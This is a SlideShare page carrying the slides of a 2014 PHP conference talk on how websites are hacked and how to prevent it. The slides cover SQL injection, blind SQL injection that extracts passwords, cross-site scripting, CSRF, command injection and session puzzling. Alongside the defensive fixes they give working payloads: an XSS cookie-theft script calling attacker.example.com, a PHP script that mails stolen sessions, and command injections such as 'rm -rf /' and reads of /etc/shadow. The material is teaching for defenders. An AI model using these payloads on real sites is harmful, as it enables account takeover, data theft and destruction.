Hacking Sites for Fun and
Profit	
SkiPHP 2014
David Stockton
or How to Hack
Websites and Prevent
Your Site from Being
Hacked
or How I Learned to Stop Worrying
and Love the
SQL Injection
Web
What this is for
•

Learn how common exploits are
done and how to identify code
that is vulnerable

•

Learn how to fix cod...
What this is not for
•

Hacking or attacking sites
that you do not have
permission to attack
!

•

Don’t do it.
The Code
•

The code I am showing you is
similar to real code I’ve seen in
real projects, but it was written
specifically f...
Exploit 1:
•

SQL injection
!

•

select * from users where
username =
'$_POST['username']';
SQL Injection
•

$_POST['username'] = “' OR 1=1; --;”;
!
!

•

select * from users where username =
'' OR 1=1; --;';
SQL Injection
•

$_GET

•

$_POST

•

$_REQUEST
!

•

what else...
SQL Injection
•

$_COOKIE
!

•

values from the database
!

•

Some parts of $_SERVER
Errors can help attackers
•

Showing SQL errors can help attackers fix SQL injection
attempts

!
•

Other errors can help i...
Blind SQL injection
•

Make calls that take
varying amounts of time to
run. Use the time to
determine the answers to
quest...
Blind SQL injection
•

http://news.org/news.php?id=5

•

http://news.org/news.php?id=5 and 1=1

•

http://news.org/news.ph...
Determine DB version
•

news.php?id=5 and
substring(@@version,
1,1)=5
Subselects?

•

news.php?id=5 and
(select 1) = 1
Access to other databases/
tables
•

news.php?id=12 and
(select 1 from mysql.user
limit 0,1) = 1
Guessing tables
•

news.php?id=6 and
(select 1 from users
limit 0,1) =1
Guessing column names

•

news.php?id=11 and (select
substring(concat(1, password),1,1) from
users limit 0,1)=1
Guessing data
•

news.php?id=4 and
ascii(substring((SELECT concat(username,
0x3a, password) from users limit 0,1),
1,1))>8...
Preventing SQL Injection
●

mysql_real_escape_string

●

Prepared statements

●

Input validation and whitelists
Exploit 2:
•

XSS
!

•

Cross-site Scripting
What is it?
•

User supplied
code running in
the browser
So? It’s their browser
•

Yep, but it may not
be their code.
So? It’s their browser
•

It may not be your
code, but it might
call your code in a
way you don’t want
XSS Code
<img src=”<?php echo $_POST[‘image’];?>”>
<.. javascript to open the print dialog ..>
So what?
•

What if we post code into
$_POST[‘image’]
!

●

Steal session cookies

●

Call Javascript APIs to causes actio...
The payload:
$_POST[‘image’]

/images/add.gif"><script type="text/
javascript">alert('xss!');</script><img
src="
Ermahgerd er perperp.
Ooh, that’s soooo malicious,
I’m totally shaking right now
•

Fine. How about this.
!
!

•

image = /images/add.gif"><scri...
WTH did that do?
•

Javascript ran FROM the site
we’re attacking and it sent
your site cookies to a script
the attacker co...
So you stole my cookie. So
what?
•

Here’s what.

<?php

$session = $_GET['PHPSESSID'];

$body = 'Got session: ' . $sessio...
Oooh, you emailed my
cookie... So...
Now it’s my turn...
Why this matters
•

Sites identify and authenticate
users with session.

•

I have identified myself as you. I
am now logge...
Ok, so I can steal my own
session
•

Here’s how to use
it against someone.
The first part of the attack
•

Create an email to a link on the
attacking site that posts the code to the
site under attac...
What else can I do?
•

Cross Site Request Forgery (CSRF)

•

Causing actions to happen on the user’s
behalf

•

Purchasing...
How to prevent?
•

Escape output

•

Whitelist URLs, domains, input

•

Make the print page lookup and use image
paths fro...
Prevent CSRF
•

Use a CSRF token.

•

Disallow requests
that don’t contain the
correct token.
Exploit prevention in
general
•

Filter input

•

Escape output

•

This works for SQL injection, XSS and
more...

•

in g...
Exploit 3: Command
injection
●

shell_exec

●

exec

●

passthru

●

system

●

`some command`
PHP Web File Browser
•

Supposed to allow viewing of files within
the web directories

•

$files = shell_exec(‘ls -al ’ .
$...
What’s the danger?
•

$_GET[‘dir’] = ‘.; rm -rf / *’;

•

Or whatever.

•

cat /etc/passwd; cat /etc/shadow
How to prevent?
•

If you must use user input in a command,
use escapeshellarg()

•

$dir = escapeshellarg($_GET[‘dir’]);
...
Other types of injection
●

Code (eval)

●

Regex

●

Log

●

LDAP
Other exploits
●

Authentication / Session management

●

Information disclosure

●

Sensitive data exposure

●

File uplo...
Mitigation
•

Validation on the client
•

Reject invalid requests entirely, log
intrusion attempt

•

Principle of least p...
One more exploit
•

Session puzzling attack

•

http://bit.ly/1eO7jPK
Session Puzzling

•

Making requests to privileged and
unprivileged pages in a particular order
that can escalate privileg...
How it could work

•

Page requiring authentication looks for
‘user’ in session to determine
authentication
Session Puzzling

•

Login -> forgot password page sends
information via ‘user’ in session
Put it together
•

Hit pages quickly in this order:

•

Login -> forgot password / privileged page

•

Privileged page see...
How was this found?	

•

By accident, via web crawler getting
access to privileged pages
Questions?
•

Please rate this talk.

•

https://joind.in/10446
Upcoming SlideShare
Loading in …5
×

Hacking sites for fun and profit

7,687 views

Published on

How common exploits are used to take over a website, how to identify those vulnerabilities in your own code and prevent your site from being compromised. The bad guys know all the techniques, but it doesn't mean we should make it any easier to take over sites. Preventing some vulnerabilities is done by keeping these issues in mind as you're developing your code.

Published in: Technology
  • Be the first to comment

Hacking sites for fun and profit

  1. 1. Hacking Sites for Fun and Profit SkiPHP 2014 David Stockton
  2. 2. or How to Hack Websites and Prevent Your Site from Being Hacked
  3. 3. or How I Learned to Stop Worrying and Love the SQL Injection Web
  4. 4. What this is for • Learn how common exploits are done and how to identify code that is vulnerable • Learn how to fix code that is susceptible to these attacks • Learn how to attack your own code and your own sites so you can fix them
  5. 5. What this is not for • Hacking or attacking sites that you do not have permission to attack ! • Don’t do it.
  6. 6. The Code • The code I am showing you is similar to real code I’ve seen in real projects, but it was written specifically for this presentation.
  7. 7. Exploit 1: • SQL injection ! • select * from users where username = '$_POST['username']';
  8. 8. SQL Injection • $_POST['username'] = “' OR 1=1; --;”; ! ! • select * from users where username = '' OR 1=1; --;';
  9. 9. SQL Injection • $_GET • $_POST • $_REQUEST ! • what else...
  10. 10. SQL Injection • $_COOKIE ! • values from the database ! • Some parts of $_SERVER
  11. 11. Errors can help attackers • Showing SQL errors can help attackers fix SQL injection attempts ! • Other errors can help in other ways (some show passwords) ! • Turn off display_errors in production, but log errors always
  12. 12. Blind SQL injection • Make calls that take varying amounts of time to run. Use the time to determine the answers to questions about the systems you are attacking.
  13. 13. Blind SQL injection • http://news.org/news.php?id=5 • http://news.org/news.php?id=5 and 1=1 • http://news.org/news.php?id=5 and 1=2
  14. 14. Determine DB version • news.php?id=5 and substring(@@version, 1,1)=5
  15. 15. Subselects? • news.php?id=5 and (select 1) = 1
  16. 16. Access to other databases/ tables • news.php?id=12 and (select 1 from mysql.user limit 0,1) = 1
  17. 17. Guessing tables • news.php?id=6 and (select 1 from users limit 0,1) =1
  18. 18. Guessing column names • news.php?id=11 and (select substring(concat(1, password),1,1) from users limit 0,1)=1
  19. 19. Guessing data • news.php?id=4 and ascii(substring((SELECT concat(username, 0x3a, password) from users limit 0,1), 1,1))>80 ! • Increment to guess values letter by letter
  20. 20. Preventing SQL Injection ● mysql_real_escape_string ● Prepared statements ● Input validation and whitelists
  21. 21. Exploit 2: • XSS ! • Cross-site Scripting
  22. 22. What is it? • User supplied code running in the browser
  23. 23. So? It’s their browser • Yep, but it may not be their code.
  24. 24. So? It’s their browser • It may not be your code, but it might call your code in a way you don’t want
  25. 25. XSS Code <img src=”<?php echo $_POST[‘image’];?>”> <.. javascript to open the print dialog ..>
  26. 26. So what? • What if we post code into $_POST[‘image’] ! ● Steal session cookies ● Call Javascript APIs to causes actions on the server (CSRF) ● Post forms as the user
  27. 27. The payload: $_POST[‘image’] /images/add.gif"><script type="text/ javascript">alert('xss!');</script><img src="
  28. 28. Ermahgerd er perperp.
  29. 29. Ooh, that’s soooo malicious, I’m totally shaking right now • Fine. How about this. ! ! • image = /images/add.gif"><script type="text/ javascript">document.write('<img src="http:// attacker.example.com/session.php?' + document.cookie + '">'); </script><img src="
  30. 30. WTH did that do? • Javascript ran FROM the site we’re attacking and it sent your site cookies to a script the attacker controls.
  31. 31. So you stole my cookie. So what? • Here’s what. <?php
 $session = $_GET['PHPSESSID'];
 $body = 'Got session: ' . $session;
 mail('attackeremail@attacker.example.org', 'Session Captured', $body);
  32. 32. Oooh, you emailed my cookie... So...
  33. 33. Now it’s my turn...
  34. 34. Why this matters • Sites identify and authenticate users with session. • I have identified myself as you. I am now logged in as you and can do anything you can do on the site.
  35. 35. Ok, so I can steal my own session • Here’s how to use it against someone.
  36. 36. The first part of the attack • Create an email to a link on the attacking site that posts the code to the site under attack. Send the email to the victim. ! • They click the link, you steal their session.
  37. 37. What else can I do? • Cross Site Request Forgery (CSRF) • Causing actions to happen on the user’s behalf • Purchasing things, changing passwords, creating accounts, etc.
  38. 38. How to prevent? • Escape output • Whitelist URLs, domains, input • Make the print page lookup and use image paths from a trusted source (database maybe?)
  39. 39. Prevent CSRF • Use a CSRF token. • Disallow requests that don’t contain the correct token.
  40. 40. Exploit prevention in general • Filter input • Escape output • This works for SQL injection, XSS and more... • in general
  41. 41. Exploit 3: Command injection ● shell_exec ● exec ● passthru ● system ● `some command`
  42. 42. PHP Web File Browser • Supposed to allow viewing of files within the web directories • $files = shell_exec(‘ls -al ’ . $_GET[‘dir’]);
  43. 43. What’s the danger? • $_GET[‘dir’] = ‘.; rm -rf / *’; • Or whatever. • cat /etc/passwd; cat /etc/shadow
  44. 44. How to prevent? • If you must use user input in a command, use escapeshellarg() • $dir = escapeshellarg($_GET[‘dir’]); • $files = shell_exec(‘ls -al ‘ . $dir); • Validate that the input is allowed
  45. 45. Other types of injection ● Code (eval) ● Regex ● Log ● LDAP
  46. 46. Other exploits ● Authentication / Session management ● Information disclosure ● Sensitive data exposure ● File upload flaws ● Unchecked redirects ● Leftover debug code ● Session fixation ● Internal threats ● Privacy Violation (password in logs, etc)
  47. 47. Mitigation • Validation on the client • Reject invalid requests entirely, log intrusion attempt • Principle of least privilege • Filter input, escape output
  48. 48. One more exploit • Session puzzling attack • http://bit.ly/1eO7jPK
  49. 49. Session Puzzling • Making requests to privileged and unprivileged pages in a particular order that can escalate privileges of the attacker
  50. 50. How it could work • Page requiring authentication looks for ‘user’ in session to determine authentication
  51. 51. Session Puzzling • Login -> forgot password page sends information via ‘user’ in session
  52. 52. Put it together • Hit pages quickly in this order: • Login -> forgot password / privileged page • Privileged page sees ‘user’ and allows attacker in
  53. 53. How was this found? • By accident, via web crawler getting access to privileged pages
  54. 54. Questions? • Please rate this talk. • https://joind.in/10446

×